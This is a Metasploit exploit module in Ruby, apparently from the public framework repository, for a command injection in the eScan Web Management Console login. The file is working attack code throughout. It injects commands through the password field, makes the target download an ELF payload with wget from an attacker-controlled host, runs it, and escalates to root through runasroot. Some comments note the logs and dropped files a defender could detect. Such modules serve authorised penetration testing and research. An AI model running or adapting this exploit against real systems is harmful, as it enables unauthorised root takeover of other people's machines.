Path: blob/master/modules/exploits/linux/antivirus/escan_password_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  #
  # Everything this module does on the target is visible in two places a
  # defender can monitor: the POST to login.php carrying a ';'-prefixed
  # password (IOC_IN_LOGS) and the dropped ELF under WRITABLEDIR
  # (ARTIFACTS_ON_DISK), which FileDropper removes again on session close.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'eScan Web Management Console Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability found in the eScan Web Management
          Console. The vulnerability exists while processing CheckPass login requests. An attacker
          with a valid username can use a malformed password to execute arbitrary commands. With
          mwconf privileges, the runasroot utility can be abused to get root privileges. This module
          has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Joxean Koret', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2014-125118' ],
          [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
        ],
        'Payload' => {
          # The injected string is whitespace/metachar sensitive (see wget_payload),
          # so a native ELF is dropped instead of using an ARCH_CMD payload.
          'BadChars' => '', # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
          'DisableNops' => true
        },
        'Arch' => ARCH_X86,
        'Platform' => 'linux',
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          ['eScan 5.5-2 / Linux', {}],
        ],
        'DisclosureDate' => '2014-04-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10080),
        OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
        OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
      ]
    )
  end

  # Fingerprints the console by fetching index.php and looking for the
  # "eScan WebAdmin" banner. This is a banner match only, so the result is
  # capped at Detected; the vulnerable login path is not probed.
  #
  # @return [Msf::Exploit::CheckCode] Detected on a banner match, Unknown otherwise
  def check
    index_uri = normalize_uri(target_uri.path.to_s, 'index.php')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => index_uri
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200
    return Exploit::CheckCode::Unknown unless res.body =~ /eScan WebAdmin/

    Exploit::CheckCode::Detected
  end

  # Runs +cmd+ on a newly opened session and returns its output.
  #
  # Only plain shell sessions are driven; a meterpreter session gets a
  # warning and nothing is executed, so the escalation in on_new_session
  # silently becomes a no-op for it.
  #
  # @param session [Msf::Session] the session to run the command on
  # @param cmd [String] command to execute
  # @return [String] chomped output, or '' when nothing was run or returned
  def cmd_exec(session, cmd)
    output = nil

    case session.type
    when /meterpreter/
      print_warning('Use a shell payload in order to get root!')
    when /shell/
      output = session.shell_command_token(cmd)
      output.chomp! unless output.nil?
    end

    output || ''
  end

  # Session callback. The injected command runs as the console's service
  # account (mwconf, uid 196 per the original author's note), so a root shell
  # is spawned through runasroot before the session is handed to the framework.
  def on_new_session(session)
    root_shell = "#{datastore['RUNASROOT'].shellescape} /bin/sh"
    cmd_exec(session, root_shell)
    super
  end

  # HttpServer hook fired once the listener is up: advertise our own URL as
  # the payload source and trigger the download on the target.
  def primer
    @payload_url = get_uri
    wget_payload
  end

  # Serves the generated ELF to whoever requests the registered resource.
  # @pl is populated by #exploit before the server is started.
  def on_request_uri(cli, request)
    print_status("Request: #{request.uri}")
    return unless request.uri =~ /#{Regexp.escape(get_resource)}/

    print_status('Sending payload...')
    send_response(cli, @pl)
  end

  # Let the module run under autofilter (the HttpServer mixin would otherwise
  # opt it out).
  def autofilter
    true
  end

  # Entry point. With EXTURL set the payload is fetched from that host;
  # otherwise the built-in HTTP server is started and kept up for HTTPDELAY
  # seconds, during which #primer performs the download. Either way the
  # dropped file is then executed.
  def exploit
    @pl = generate_payload_exe
    @payload_url = ''

    if datastore['EXTURL'].present?
      @payload_url = datastore['EXTURL']
      wget_payload
    else
      begin
        Timeout.timeout(datastore['HTTPDELAY']) { super }
      rescue Timeout::Error => e
        # The server simply timed out waiting for the callback; execution is
        # still attempted below.
        vprint_error(e.message)
      end
    end

    exec_payload
  end

  # Downloads the ELF onto the target via wget and registers it for cleanup.
  #
  # ${IFS} stands in for spaces because the injection point rejects the
  # characters listed in the Payload metadata (space included); this is also
  # why ARCH_CMD payloads are not used. Success is inferred from the console
  # redirecting to its "bad password" page, which is the expected response
  # once the login handler has run the injected command.
  def wget_payload
    @dropped_elf = rand_text_alpha(rand(3..7))
    dropped_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{dropped_path}"

    print_status('Downloading the payload to the target machine...')
    res = exec_command(command)

    redirected_to_login = res &&
                          res.code == 302 &&
                          res.headers['Location'] &&
                          res.headers['Location'] =~ /index\.php\?err_msg=password/

    if redirected_to_login
      register_files_for_cleanup(dropped_path)
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
    end
  end

  # Marks the dropped file executable and runs it. The short timeout is
  # deliberate: the payload is expected to hold the connection open, so the
  # HTTP response for this request never completes.
  def exec_payload
    dropped_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    command = "chmod${IFS}777${IFS}#{dropped_path};#{dropped_path}"

    print_status('Executing the payload...')
    exec_command(command, 1)
  end

  # Submits +command+ through the vulnerable login form. Every command this
  # module runs passes through here, so the login.php POST with a ';'-prefixed
  # pass value is the log artifact to alert on.
  #
  # @param command [String] command to inject
  # @param timeout [Integer] HTTP response timeout in seconds
  # @return [Rex::Proto::Http::Response, nil] the console's response, if any
  def exec_command(command, timeout = 20)
    login_form = {
      'uname' => datastore['USERNAME'],
      'pass' => ";#{command}",
      'product_name' => 'escan',
      'language' => 'English',
      'login' => 'Login'
    }

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
      'vars_post' => login_form
    }, timeout)
  end
end